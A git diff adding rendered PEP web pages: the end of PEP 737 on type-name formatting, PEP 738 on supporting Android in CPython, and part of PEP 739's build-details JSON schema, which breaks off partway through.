+

Add type.__format__() method with the following formats:

+
    +
  • N formats the type fully qualified name +(type.__fully_qualified_name__); +N stands for Name.
  • +
  • #N (alternative form) formats the type fully qualified name +using the colon (:) separator, instead of the dot separator +(.), between the module name and the qualified name.
  • +
+

Examples using f-string:

+
>>> import datetime
+>>> f"{datetime.timedelta:N}"  # fully qualified name
+'datetime.timedelta'
+>>> f"{datetime.timedelta:#N}" # fully qualified name, colon separator
+'datetime:timedelta'
+
+
+

The colon (:) separator used by the #N format eliminates +guesswork when you want to import the name, see +pkgutil.resolve_name(), python -m inspect command line +interface, and setuptools entry points.

+

This change was rejected by the Steering Council.

+
+
+

Change str(type)

+

The type.__str__() method can be modified to format a type name +differently. For example, it can return the type fully qualified name.

+

The problem is that it’s a backward incompatible change. For example, +enum, functools, optparse, pdb and xmlrpc.server +modules of the standard library have to be updated. +test_dataclasses, test_descrtut and test_cmd_line_script +tests have to be updated as well.

+

See the pull request: type(str) returns the fully qualified name.

+
+
+

Add !t formatter to get an object type

+

Use f"{obj!t:T}" to format type(obj).__fully_qualified_name__, +similar to f"{type(obj):T}".

+

When the !t formatter was proposed in 2018, Eric Smith was strongly +opposed to this; +Eric is the author of the f-string PEP 498 “Literal String Interpolation”.

+
+
+

Add formats to str % args

+

It was proposed to add formats to format a type name in str % arg. +For example, add the %T format to format a type fully qualified +name.

+

Nowadays, f-strings are preferred for new code.

+
+
+

Other ways to format type names in C

+

The printf() function supports multiple size modifiers: hh +(char), h (short), l (long), ll (long long), +z (size_t), t (ptrdiff_t) and j (intmax_t). +The PyUnicode_FromFormat() function supports most of them.

+

Proposed formats using h and hh length modifiers:

+
    +
  • %hhT formats type.__name__.
  • +
  • %hT formats type.__qualname__.
  • +
  • %T formats type.__fully_qualified_name__.
  • +
+

Length modifiers are used to specify the C type of the argument, not to +change how an argument is formatted. The alternate form (#) changes +how an argument is formatted. Here the argument C type is always +PyObject*.

+

Other proposed formats:

+
    +
  • %Q
  • +
  • %t.
  • +
  • %lT formats type.__fully_qualified_name__.
  • +
  • %Tn formats type.__name__.
  • +
  • %Tq formats type.__qualname__.
  • +
  • %Tf formats type.__fully_qualified_name__.
  • +
+

Having more options to format type names can lead to inconsistencies +between different modules and make the API more error prone.

+

About the %t format, printf() now uses t as a length +modifier for ptrdiff_t argument.

+

The following APIs to be used to format a type:

+ + + + + + + + + + + + + + + + + + + + + +
C APIPython APIFormat
PyType_GetName()type.__name__Type short name.
PyType_GetQualName()type.__qualname__Type qualified name.
PyType_GetModuleName()type.__module__Type module name.
+
+
+

Use %T format with Py_TYPE(): pass a type

+

It was proposed to pass a type to the %T format, like:

+
PyErr_Format(PyExc_TypeError, "object type name: %T", Py_TYPE(obj));
+
+
+

The Py_TYPE() functions returns a borrowed reference. Just to format +an error, using a borrowed reference to a type looks safe. In practice, +it can lead to crash. Example:

+
import gc
+import my_cext
+
+class ClassA:
+    pass
+
+def create_object():
+     class ClassB:
+          def __repr__(self):
+                self.__class__ = ClassA
+                gc.collect()
+                return "ClassB repr"
+     return ClassB()
+
+obj = create_object()
+my_cext.func(obj)
+
+
+

where my_cext.func() is a C function which calls:

+
PyErr_Format(PyExc_ValueError,
+             "Unexpected value %R of type %T",
+             obj, Py_TYPE(obj));
+
+
+

PyErr_Format() is called with a borrowed reference to ClassB. +When repr(obj) is called by the %R format, the last reference to +ClassB is removed and the class is deallocated. When the %T +format is proceed, Py_TYPE(obj) is already a dangling pointer and +Python does crash.

+
+
+

Other proposed APIs to get a type fully qualified name

+
    +
  • Add type.__fullyqualname__ attribute: name without underscore +between words. Several dunders, including some of the most recently +added ones, include an underscore in the word: +__class_getitem__, __release_buffer__, __type_params__, +__init_subclass__ and __text_signature__.
  • +
  • Add type.__fqn__ attribute: FQN name stands for Fully +Qualified Name.
  • +
  • Add type.fully_qualified_name() method. Methods added to type +are inherited by all types and so can affect existing code.
  • +
  • Add a function to the inspect module. Need to import the +inspect module to use it.
  • +
+
+
+

Include the __main__ module in the type fully qualified name

+

Format type.__fully_qualified_name__ as +f"{type.__module__}.{type.__qualname__}", or type.__qualname__ if +type.__module__ is not a string or is equal to "builtins". Do +not treat the __main__ module differently: include it in the name.

+

Existing code such as type.__repr__(), collections.abc and +unittest modules format a type name with +f'{obj.__module__}.{obj.__qualname__}' and only omit the module part +if the module is equal to builtins.

+

Only the traceback and pdb modules also omit the module if it’s +equal to "builtins" or "__main__".

+

The type.__fully_qualified_name__ attribute omits the __main__ +module to produce shorter names for a common case: types defined in a +script run with python script.py. For debugging, the repr() +function can be used on a type, it includes the __main__ module in +the type name. Or use f"{type.__module__}.{type.__qualname__}" +format to always include the module name, even for the "builtins" +module.

+

Example of script:

+
class MyType:
+    pass
+
+print(f"name: {MyType.__fully_qualified_name__}")
+print(f"repr: {repr(MyType)}")
+
+
+

Output:

+
name: MyType
+repr: <class '__main__.MyType'>
+
+
+
+
+
+

Discussions

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0737.rst

+

Last modified: 2024-06-01 20:53:34 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0738/index.html b/pep-0738/index.html new file mode 100644 index 00000000000..c5f9d07eede --- /dev/null +++ b/pep-0738/index.html @@ -0,0 +1,547 @@ + + + + + + + + PEP 738 – Adding Android as a supported platform | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 738 – Adding Android as a supported platform

+
+
Author:
+
Malcolm Smith <smith at chaquo.com>
+
Sponsor:
+
Petr Viktorin <encukou at gmail.com>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
12-Dec-2023
+
Python-Version:
+
3.13
+
Resolution:
+
Discourse message
+
+
+
+
Table of Contents +
+
+

Important

+

This PEP is a historical document. The up-to-date, canonical documentation can now be found at Using Python on Android.

+

×

+

See PEP 1 for how to propose changes.

+
+
+

Abstract

+

This PEP proposes adding Android as a supported platform in CPython. The initial +goal is for Android to achieve Tier 3 support in Python 3.13.

+

This PEP is based on PEP 730 – “Adding iOS as a supported platform” by +Russell Keith-Magee, and covers many of the same issues. Notable differences +between the two platforms can be found by searching for the word “iOS”.

+
+
+

Motivation

+

Over the last 15 years, mobile platforms have become increasingly important +parts of the computing landscape. Android is the operating system that runs on +about 70% of these devices. However, there +is no official support for Android in CPython.

+

The Chaquopy, BeeWare and Kivy projects +have all supported Android for many years, and they have all been used to +generate applications that have been accepted for publication in the Google Play +Store. This demonstrates the technical feasibility of Android support.

+

It is important for the future of Python as a language that it is able to be +used on any platform that has widespread adoption. Otherwise, potential users +will choose other languages that do provide support for these platforms. This +is especially true in education, where the next generation of developers is in +many cases already spending more time using mobile platforms than desktop ones.

+
+
+

Rationale

+
+

General

+

Android is broadly a POSIX platform, based on a Linux kernel and the +ELF binary format. It does not use glibc, instead providing its own C +library implementation called Bionic. As a result, it is generally not +binary-compatible with any other Linux distribution, even if the architecture +matches. It also has its own filesystem layout which doesn’t resemble any other +Unix.

+

However, Android’s source-compatibility with Linux is quite good. In its early years, +the C library was very incomplete, but most of the gaps were filled by around +2014. Since then, any C code that compiles for Linux can usually be compiled for +Android, unless it involves direct access to hardware devices or operating +system services.

+

This is also true of CPython. Although it has never officially supported +Android, recent versions (since 3.6) can already be compiled for Android with +minimal patching.

+
+
+

OS versions

+

Each Android version can be identified in three ways:

+
    +
  • A conventional dotted version number (though recent versions have all used +whole numbers)
  • +
  • A sequential integer “API level” (the most common form in developer +documentation)
  • +
  • An alphabetic confectionery-themed code name (no longer used for marketing, +but still appears in developer documentation)
  • +
+

There is no consistent pattern to link one of these to another; they must be +looked up in a table.

+

A new major Android version is released each year, but the updates available to +each device are entirely under the control of its manufacturer. Unfortunately +many manufacturers stop sending updates to devices long before their users are +ready to dispose of them. For example, as of October 2023, the oldest Android +version still receiving security updates was API level 30, but according to +Google’s own statistics, only 60% +of devices were on that version or newer.

+

For Python 3.13 we therefore propose the minimum Android version to be 5.0 +(API level 21), which was released in 2014. According to the statistics above, +this would cover 99% of active devices.

+
+
+

Development tools

+

The Android development tools are equally supported on Linux (x86_64), Windows +(x86_64) and macOS (x86_64 and ARM64). For CPython, the most important tools +are:

+
    +
  • The NDK (native development kit) contains a C and C++ compiler (clang), +linker (lld), and headers for all the system libraries.

    Binary compatibility between libraries compiled with different versions of the +NDK is generally very good, but for reproducibility it would be best for each +Python version to stick with one NDK version throughout its life. For Python +3.13, this would be the current NDK long-term support version, r26.

    +

    Each NDK version can be set to target any of a wide range of Android versions. +For example, NDK r26 supports API levels 21 to 34. +However, binaries compiled for an older Android version will usually keep on +working indefinitely on newer versions; exceptions to this rule are only made +for security reasons.

    +
  • +
  • Gradle is the tool used to build complete, deployable apps.
  • +
  • The emulator, based on QEMU, is a simulated Android device running on a +development machine. Unlike on iOS, an emulator uses the same ABI as a real +device of the same architecture, and can run the same binaries.
  • +
+

These tools may all be used either from the command line, or through the Android +Studio IDE, which is based on IntelliJ IDEA.

+
+
+

Architectures

+

Android currently supports 4 architectures. Their names as used by the Android +tools are:

+
    +
  • armeabi-v7a
  • +
  • arm64-v8a
  • +
  • x86
  • +
  • x86_64
  • +
+

Virtually all current physical devices use one of the ARM architectures. x86 +and x86_64 are supported for use in the emulator.

+

For Python 3.13 we propose that Tier 3 support will only cover the 64-bit platforms +(arm64-v8a and x86_64):

+
    +
  • x86 has not been supported as a development platform since 2020, and no +new emulator images have been released since then.
  • +
  • armeabi-v7a’s proportion of active devices is now +less than 10% and steadily falling.

    It would also be more difficult to cover with a reliable buildbot, since there +are no native hosts available for the emulator (ARM64 Macs don’t have hardware +support for ARM32 code). Although cross-architecture emulation is possible, it +has much worse performance and stability, which is why the armeabi-v7a +emulator images have not been updated since 2016.

    +

    However, it continues to be used for watches and ultra-low-cost phones. If +this persists, we may need to consider adding it in a future Python version.

    +
  • +
+

Even if 32-bit architectures are not officially supported, no changes should be +made which would impede any downstream projects which still wish to build them.

+
+
+

App lifecycle

+

The primary programming language in Android apps is Java, or its modern descendant +Kotlin. As such, an app does not provide its own executable file. Instead, all +apps start off as a Java virtual machine running an executable provided by the +operating system. The app’s Java code can then add native code to the process by +loading dynamic libraries and calling them through JNI.

+

Unlike iOS, creating subprocesses is supported on Android. However apps may +only run executables in certain locations, none of which +are writable at runtime. Long-running subprocesses are officially discouraged, and are not +guaranteed to be supported in future Android versions.

+

Android does provide a command-line shell, but this is intended only for use by +developers, and is not available to the typical end user.

+

For these reasons, the recommended way of running Python on Android will be by +loading libpython3.x.so into the main app process. A python3.x +executable will not be officially supported on this platform.

+
+
+
+

Specification

+
+

Scope of work

+

The focus of this work will be to produce an Android equivalent to the existing +Windows embeddable package, +i.e. a set of compiled libraries which developers +can add to their apps. No installer will be required.

+

Adding Android as a Tier 3 platform only requires adding support for compiling +an Android-compatible build from the unpatched CPython source code. It does not +necessarily require there to be any officially distributed Android artifacts on +python.org, although these could be added in the future.

+

Android will be built using the same configure and Makefile system as other +POSIX platforms, and must therefore be built on a POSIX platform. Both Linux +and macOS will be supported.

+

A Gradle project will be provided for the purpose of running the CPython test +suite. Tooling will be provided to automate the process of building the test +suite app, starting the emulator, installing the test suite, and executing +it.

+
+
+

Linkage

+

For the reasons discussed in App lifecycle, Python will be included in the +app as a dynamic libpython3.x.so library which can be loaded into an app +using dlopen.

+

Unlike Linux, Android does not implicitly use a dlopened library to resolve +relocations in subsequently-loaded libraries, even if RTLD_GLOBAL is used. All +Python extension modules must therefore be explicitly linked against +libpython3.x.so when building for Android.

+

An extension module linked against libpython3.x.so cannot be loaded by an +executable that has been statically linked against libpython3.x.a. +Therefore, a static libpython3.x.a library will not be supported on Android. +This is the same pattern used by CPython on Windows.

+

This approach also allows using the -Wl,--no-undefined option to detect +missing symbols at build time, which can be a significant time-saver.

+

Unlike iOS, Android allows dynamic libraries to be loaded from any location, so +a directory tree containing co-located .py, .pyc and .so files can be handled by +Python’s standard importer.

+
+
+

Standard library

+
+

Unsupported modules

+

A number of standard library modules will not be supported on Android because +the underlying C APIs are not available:

+
    +
  • curses and readline
  • +
  • dbm.gnu and dbm.ndbm
  • +
  • grp
  • +
  • multiprocessing – although subprocesses in general are allowed (see App +lifecycle), Android does not support any part of the System V IPC API.
  • +
  • tkinter and turtle – these would require an Android build of Tk +itself, which is not officially supported.
  • +
+
+
+

sys

+

sys.platform will return "android". Although Android is based on Linux, +it differs in enough significant ways that a separate name is justified.

+

When embedded in an Android app, the C-level stdio streams are not connected to +anything. So in this mode, sys.stdout and sys.stderr will be redirected +to the system Logcat, +which can be viewed with the Android development tools. sys.stdin will +always return EOF.

+
+
+

platform

+

Most of the values returned by the platform module will match those returned +by os.uname(), with the exception of:

+
    +
  • platform.system() - "Android", instead of the default "Linux"
  • +
  • platform.release() - Android version number, as a string (e.g. "14"), +instead of the Linux kernel version
  • +
+

In addition, a platform.android_ver() method will be added, which returns a +namedtuple containing the following:

+
    +
  • release - Android version of the device, as a string (e.g. "14")
  • +
  • api_level - API level of the device, as an +integer (e.g. 34)
  • +
  • manufacturer - manufacturer of +the device, as a string (e.g. "Google")
  • +
  • model - model name of the +device, as a string (e.g. "Pixel 7")
  • +
  • device - device name of the +device, as a string (e.g. "panther")
  • +
  • is_emulator - True if the device is an emulator; False if it’s a +physical device.
  • +
+

Which one of model and device is more likely to be unique, and which one +is more likely to resemble the marketing name, varies between different +manufacturers.

+
+
+

os

+

os.uname() will return the raw result of a POSIX uname() call. This will +result in the following values:

+
    +
  • sysname - "Linux"
  • +
  • release - The Linux kernel version (e.g. +"5.10.157-android13-4-00003-gdfb1120f912b-ab10994928")
  • +
+

This approach treats the os module as a “raw” interface to system APIs, and +platform as a higher-level API providing more generally useful values.

+
+
+
+

CI resources

+

Since Android emulators and physical devices use the same ABI, and come with +identical or very similar operating system binaries, testing on emulators will +be adequate. x86_64 emulators can be run on Linux, macOS or Windows, but ARM64 +emulators are only supported on ARM64 Macs.

+

Anaconda has offered +to provide physical hardware to run Android buildbots. These will include both +Linux x86_64 and macOS ARM64 machines, which would cover both supported runtime +architectures and both supported build platforms.

+

CPython does not currently test Tier 3 platforms on GitHub Actions, but if this +ever changes, their Linux and macOS runners are also able to host Android +emulators. macOS ARM64 runners have been free to all public repositories +since January 2024.

+
+
+

Packaging

+

Android wheels will use tags in the format android_<api-level>_<abi>. For +example:

+
    +
  • android_21_arm64_v8a
  • +
  • android_21_x86_64
  • +
+

For the meaning of <api-level>, see OS versions. In the context of +the wheel tag, it indicates the minimum Android version that was selected when +the wheel was compiled. Installation tools such as pip should interpret this in +a similar way to the existing macOS tags, i.e. an app with a minimum API level +of N can incorporate wheels tagged with API level N or older.

+

This format originates from the Chaquopy project, which currently maintains a +wheel repository with tags varying between +API levels 16 and 21.

+

However, relying on a small group of Android enthusiasts to build the whole +Python ecosystem is not a scalable solution. Until prominent libraries routinely +release their own Android wheels, the ability of the community to adopt +Python on Android will be limited.

+

Therefore, it will be necessary to clearly document how projects can add Android +builds to their CI and release tooling. Adding Android support to tools like +crossenv and cibuildwheel may be one way to achieve this.

+

The Android wheel tag format should also be added to the list of tags accepted +by PyPI.

+
+
+

PEP 11 Update

+

PEP 11 will be updated to include the two supported Android ABIs. Autoconf +already identifies them with the following triplets:

+
    +
  • aarch64-linux-android
  • +
  • x86_64-linux-android
  • +
+

Petr Viktorin will serve as the initial core team contact for these ABIs.

+
+
+
+

Backwards Compatibility

+

Adding a new platform does not introduce any backwards compatibility concerns to +CPython itself. However, there may be some backwards compatibility implications +on the projects that have historically provided CPython support (i.e., BeeWare +and Kivy) if the final form of any CPython patches don’t align with the patches +they have historically used.

+
+
+

Security Implications

+

Adding a new platform does not add any new security implications.

+
+
+

How to Teach This

+

The education needs related to this PEP relate to two groups of developers.

+

First, developers of apps need to know how to build Python into an Android +app, along with their own Python code and any supporting packages, and how to +use them all at runtime. The documentation will cover this in a similar form to +the existing Windows embeddable package. +However, it will recommend most developers to use higher-level tools such as +Briefcase, +Chaquopy and Buildozer, all of which already have +comprehensive documentation.

+

Second, developers of packages with binary components need to know how to +build and release them for Android (see Packaging).

+
+
+

Reference Implementation

+

The Chaquopy repository contains a reference +patch and build scripts. These will have to be decoupled from the other +components of Chaquopy before they can be upstreamed.

+

Briefcase provides a reference +implementation of code to execute test suites on Android devices and emulators. +The Toga Testbed is an +example of a test suite that is executed on the Android emulator using GitHub +Actions.

+
+
+

Rejected Ideas

+

The following changes were made to the original specification of +platform.android_ver():

+
    +
  • The min_api_level field was removed, because unlike all the other fields, +it isn’t a property of the current device. This information is still available +from the pre-existing function sys.getandroidapilevel().
  • +
  • The is_emulator field was added, since experience during testing showed +that some issues were emulator-specific.
  • +
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0738.rst

+

Last modified: 2024-10-07 17:43:06 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0739/index.html b/pep-0739/index.html new file mode 100644 index 00000000000..cf84b767849 --- /dev/null +++ b/pep-0739/index.html @@ -0,0 +1,1559 @@ + + + + + + + + PEP 739 – Static description file for build details of Python installations | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 739 – Static description file for build details of Python installations

+
+
Author:
+
Filipe Laíns <lains at riseup.net>
+
PEP-Delegate:
+
Paul Moore <p.f.moore at gmail.com>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Draft
+
Type:
+
Standards Track
+
Topic:
+
Packaging
+
Created:
+
19-Dec-2023
+
Python-Version:
+
3.14
+
+
+
+
Table of Contents +
+
+

Abstract

+

Introduce a standard format for a static description file with build details +of Python installations.

+
+
+

Rationale

+

When introspecting a Python installation, running code is often undesirable or +impossible. Having a static description file makes various of Python build +details available without having to run the interpreter.

+

This is helpful for use-cases such as cross-compilation, Python launchers, etc.

+
+
+

Scope

+

This PEP defines a format for the description file, and a standard location for +where to place it.

+
+
+

Location

+

When possible, Python installations should install the static description file +inside the standard library directory, with the name build-details.json +(Eg. /usr/lib/python3.14/build-details.json).

+
+

Important

+

Given that there may be technical challenges, Python implementations are not +required to provide the file if not feasable. In such scenarios, they may +choose to provide it in a different maner.

+
+
+

Attention

+

Notwithstanding the standard location specified here, it does not prevent the +file from additionally being provided in another location, and with a +different name. In fact, the PEP authors expect future PEPs to define +additional locations to install this file, for better discoverability.

+
+
+
+

Format

+

The format specification is defined by the JSON Schema definition provided +below, which is rendered in an human-readable format here.

+ ++++ + + + + + + + + + + + + + + + + + +
$schemahttps://json-schema.org/draft/2020-12/schema
$idhttps://github.com/python/peps/blob/main/peps/pep-0739/python-build-info-v1.0.schema.json
TitleStatic description file for the build details of Python +installations
Typeobject
Additional propertiesNot allowed
+
+

schema_version

+ ++++ + + + + + + + + + + + +
Typestring (constant — 1.0)
DescriptionSchema version.

This is a string following the format <MAJOR>.<MINOR>, where +<MAJOR> and <MINOR> are unpaded numbers and represent +the major and minor components of the version. Versions +may be arithmetic compared by intrepreting the version string as +a decimal number.

+

For this specification version, this value is constant and MUST +be 1.0.

+

Future versions of this schema MUST use a higher version number. +Future versions of this schema MUST NOT use the same major +version component as other schema version unless its +specification is deemed backwards-compatible with them — it +can’t change, or extend, any parts of the current specification +in such a way as the semantics of the interpreted data differ, +or that data valid under the new specification is invalid under +the older specification, with the exception of additional +properties (errors caused by additionalProperties).

+
RequiredTrue
+
+
+

base_prefix

+ ++++ + + + + + + + + + + + + + + +
Typestring
DescriptionBase prefix of the Python installation.

Either an absolute path, or a relative path to directory where +this file is contained.

+
Examples/usr, ../.., etc.
RequiredFalse
+
+
+

platform

+ ++++ + + + + + + + + + + + + + + +
Typestring
DescriptionSystem platform string.

This field SHOULD be equivalent to sysconfig.get_platform().

+
Examples
    +
  • linux-x86_64
  • +
  • etc.
  • +
+
RequiredTrue
+
+
+

language

+ ++++ + + + + + + + + + + + + + + +
Typeobject
DescriptionObject containing details related to the Python language +specification.

In addition to the required keys, implementations may choose to +include extra keys with implementation-specific details.

+
RequiredTrue
Additional propertiesNot allowed
+
+

language.version

+ ++++ + + + + + + + + + + + + + + +
Typestring
DescriptionString representation the Python language version — a version +string consisting only of the major and minor components.

This field SHOULD be equivalent to +sysconfig.get_python_version().

+
Examples3.14, etc.
RequiredTrue
+
+
+

language.version_info

+ ++++ + + + + + + + + + + + + + + + + + +
Typeobject
DescriptionObject in the format of sys.version_info.

This section SHOULD be equivalent to +sys.version_info.

+
Examples
    +
  • {'major': 3, 'minor': 14, 'micro': 1, 'releaselevel': 'final', 'serial': 0}
  • +
  • etc.
  • +
+
RequiredFalse
Additional propertiesNot allowed
+
+
language.version_info.major
+ ++++ + + + + + + + + +
Typenumber
RequiredTrue
+
+
+
language.version_info.minor
+ ++++ + + + + + + + + +
Typenumber
RequiredTrue
+
+
+
language.version_info.micro
+ ++++ + + + + + + + + +
Typenumber
RequiredTrue
+
+
+
language.version_info.releaselevel
+ ++++ + + + + + + + + +
Typestring (enum — alpha, beta, candidate, final)
RequiredTrue
+
+
+
language.version_info.serial
+ ++++ + + + + + + + + +
Typenumber
RequiredTrue
+
+
+
+
+

implementation

+ ++++ + + + + + + + + + + + + + + +
Typeobject
DescriptionObject containing details related to Python implementation.

This section SHOULD be equivalent to +sys.implementation. It follows specification defined +in PEP 421, meaning that on top of the required keys, +implementation-specific keys can also exist, but must be +prefixed with an underscore.

+
RequiredTrue
Additional propertiesAllowed
+
+

implementation.name

+ ++++ + + + + + + + + + + + + + + +
Typestring
DescriptionLower-case name of the Python implementation.
Examplescpython, pypy, etc.
RequiredTrue
+
+
+

implementation.version

+ ++++ + + + + + + + + + + + + + + + + + +
Typeobject
DescriptionObject in the format of sys.version_info, containing +the implementation version.
Examples
    +
  • {'major': 3, 'minor': 14, 'micro': 1, 'releaselevel': 'final', 'serial': 0}
  • +
  • {'major': 7, 'minor': 3, 'micro': 16, 'releaselevel': 'final', 'serial': 0}
  • +
  • etc.
  • +
+
RequiredTrue
Additional propertiesNot allowed
+
+
implementation.version.major
+ ++++ + + + + + + + + +
Typenumber
RequiredTrue
+
+
+
implementation.version.minor
+ ++++ + + + + + + + + +
Typenumber
RequiredTrue
+
+
+
implementation.version.micro
+ ++++ + + + + + + + + +
Typenumber
RequiredTrue
+
+
+
implementation.version.releaselevel
+ ++++ + + + + + + + + +
Typestring (enum — alpha, beta, candidate, final)
RequiredTrue
+
+
+
implementation.version.serial
+ ++++ + + + + + + + + +
Typenumber
RequiredTrue
+
+
+
+
+

interpreter

+ ++++ + + + + + + + + + + + + + + +
Typeobject
DescriptionObject containing details Python interpreter.

This section MUST be present if the Python installation provides +an interpreter binary, otherwise this section will be missing.

+
RequiredFalse
Additional propertiesNot allowed
+
+

interpreter.path

+ ++++ + + + + + + + + + + + + + + +
Typestring
DescriptionThe path to the Python interprer. Either an absolute path, or a +relative path to the path defined in the base_prefix key.
Examples
    +
  • /usr/bin/python
  • +
  • bin/python
  • +
  • etc.
  • +
+
RequiredTrue
+
+
+
+

abi

+ ++++ + + + + + + + + + + + + + + +
Typeobject
DescriptionObject containing details related to ABI.
RequiredFalse
Additional propertiesNot allowed
+
+

abi.flags

+ ++++ + + + + + + + + + + + + + + +
Typearray
DescriptionBuild configuration flags, used to calculate the extension +suffix.

The flags MUST be defined in the order they appear on the +extension suffix.

+
Examples['t', 'd'], etc.
RequiredTrue
+
+
+

abi.extension_suffix

+ ++++ + + + + + + + + + + + + + + +
Typestring
DescriptionSuffix used for extensions built against the current +implementation version.

This field MUST be present if the Python implementation supports +extensions, otherwise this entry will be missing.

+
Examples
    +
  • .cpython-314-x86_64-linux-gnu.so
  • +
  • etc.
  • +
+
RequiredTrue
+
+
+

abi.stable_abi_suffix

+ ++++ + + + + + + + + + + + + + + +
Typestring
DescriptionSuffix used for extensions built against the stable ABI.

This field MUST be present if the Python implementation has a +stable ABI extension suffix, otherwise this entry will be +missing.

+
Examples.abi3.so, etc.
RequiredFalse
+
+
+
+

suffixes

+ ++++ + + + + + + + + + + + + + + + + + +
Typeobject
DescriptionValid module suffixes grouped by type.

This section SHOULD be equivalent to the +importlib.machinery.*_SUFFIXES attributes, if the +implementation provides such suffixes. However, if the Python +implementation does not provide suffixes of the kind specified +by any of the attributes, the equivalent sub-section is not +required to be present. Additionally, if a Python implementation +provides extension kinds other than the ones listed on +importlib.machinery module, they MAY add a sub-section for +them.

+
Examples
    +
  • {'source': ['.py'], 'bytecode': ['.pyc'], 'optimized_bytecode': ['.pyc'], 'debug_bytecode': ['.pyc'], 'extensions': ['.cpython-313-x86_64-linux-gnu.so', '.abi3.so', '.so']}
  • +
  • etc.
  • +
+
RequiredFalse
Additional propertiesAllowed
+
+
+

libpython

+ ++++ + + + + + + + + + + + + + + +
Typeobject
DescriptionObject containing details related to the libpython library.

This section MUST by present if Python installation provides a +libpython library, otherwise this section will be missing.

+
RequiredFalse
Additional propertiesNot allowed
+
+

libpython.dynamic

+ ++++ + + + + + + + + + + + + + + +
Typestring
DescriptionThe path to the dynamic libpython library. Either an +absolute path, or a relative path to the path defined in the +base_prefix key.

This field MUST be present if the Python installation provides a +dynamic libpython library, otherwise this entry will be +missing.

+
Examples
    +
  • /usr/lib/libpython3.14.so.1.0
  • +
  • lib/libpython3.14.so.1.0
  • +
  • etc.
  • +
+
RequiredFalse
+
+
+

libpython.dynamic_stableabi

+ ++++ + + + + + + + + + + + + + + +
Typestring
DescriptionThe path to the dynamic libpython library for the stable +ABI. Either an absolute path, or a relative path to the path +defined in the base_prefix key.

This field MUST be present if the Python installation provides a +dynamic libpython library, otherwise this entry will be +missing.

+
Examples
    +
  • /usr/lib/libpython3.so
  • +
  • lib/libpython3.so
  • +
  • etc.
  • +
+
RequiredFalse
+
+
+

libpython.static

+ ++++ + + + + + + + + + + + + + + +
Typestring
DescriptionThe path to the static libpython library. Either an absolute +path, or a relative path to the path defined in the +base_prefix key.

This field MUST be present if the Python installation provides a +static libpython library, otherwise this entry will be +missing.

+
Examples
    +
  • /usr/lib/python3.14/config-3.14-x86_64-linux-gnu/libpython3.14.a
  • +
  • lib/python3.14/config-3.14-x86_64-linux-gnu/libpython3.14.a
  • +
  • etc.
  • +
+
RequiredFalse
+
+ +
+
+

c_api

+ ++++ + + + + + + + + + + + + + + +
Typeobject
DescriptionObject containing details related to the Python C API, if +available.

This section MUST be present if the Python implementation +provides a C API, otherwise this section will be missing.

+
RequiredFalse
Additional propertiesNot allowed
+
+

c_api.headers

+ ++++ + + + + + + + + + + + + + + +
Typestring
DescriptionThe path to the C API headers. Either an absolute path, or a +relative path to the path defined in the base_prefix key.
Examples
    +
  • /usr/include/python3.14
  • +
  • include/python3.14
  • +
  • etc.
  • +
+
RequiredTrue
+
+
+

c_api.pkgconfig_path

+ ++++ + + + + + + + + + + + + + + +
Typestring
DescriptionThe path to the pkg-config definition files. Either an absolute +path, or a relative path to the path defined in the +base_prefix key.

This field MUST be present if the Python implementation provides +pkg-config definition files for the C API, otherwise this +section will be missing.

+
Examples
    +
  • /usr/lib/pkgconfig
  • +
  • lib/pkgconfig
  • +
  • etc.
  • +
+
RequiredFalse
+
+
+
+

arbitrary_data

+ ++++ + + + + + + + + + + + + + + +
Typeobject
DescriptionObject containing extra arbitrary data.

This is meant to be used as an escape-hatch, to include any +relevant data that is not covered by this specification. +Implamentations may choose what data to provide in this section.

+
RequiredFalse
Additional propertiesAllowed
+
+
+
+

Example

+
 1{
+ 2  "schema_version": "1.0",
+ 3  "base_prefix": "/usr",
+ 4  "platform": "linux-x86_64",
+ 5  "language": {
+ 6    "version": "3.14",
+ 7    "version_info": {
+ 8      "major": 3,
+ 9      "minor": 14,
+10      "micro": 0,
+11      "releaselevel": "alpha",
+12      "serial": 0
+13    }
+14  },
+15  "implementation": {
+16    "name": "cpython",
+17    "version": {
+18      "major": 3,
+19      "minor": 14,
+20      "micro": 0,
+21      "releaselevel": "alpha",
+22      "serial": 0
+23    },
+24    "hexversion": 51249312,
+25    "cache_tag": "cpython-314",
+26    "_multiarch": "x86_64-linux-gnu"
+27  },
+28  "interpreter": {
+29    "path": "/usr/bin/python"
+30  },
+31  "abi": {
+32    "flags": ["t", "d"],
+33    "extension_suffix": ".cpython-314-x86_64-linux-gnu.so",
+34    "stable_abi_suffix": ".abi3.so"
+35  },
+36  "suffixes": {
+37    "source": [".py"],
+38    "bytecode": [".pyc"],
+39    "optimized_bytecode": [".pyc"],
+40    "debug_bytecode": [".pyc"],
+41    "extensions": [".cpython-314-x86_64-linux-gnu.so", ".abi3.so", ".so"]
+42  },
+43  "libpython": {
+44    "dynamic": "/usr/lib/libpython3.14.so.1.0",
+45    "dynamic_stableabi": "/usr/lib/libpython3.so",
+46    "static": "/usr/lib/python3.14/config-3.14-x86_64-linux-gnu/libpython3.14.a",
+47    "link_to_libpython": true
+48  },
+49  "c_api": {
+50    "headers": "/usr/include/python3.14",
+51    "pkgconfig_path": "/usr/lib/pkgconfig"
+52  }
+53}
+
+
+
+
+

JSON Schema

+
  1{
+  2  "$schema": "https://json-schema.org/draft/2020-12/schema",
+  3  "$id": "https://github.com/python/peps/blob/main/peps/pep-0739/python-build-info-v1.0.schema.json",
+  4  "type": "object",
+  5  "title": "Static description file for the build details of Python installations",
+  6  "required": [
+  7    "schema_version",
+  8    "platform",
+  9    "language",
+ 10    "implementation"
+ 11  ],
+ 12  "additionalProperties": false,
+ 13  "properties": {
+ 14    "schema_version": {
+ 15      "type": "string",
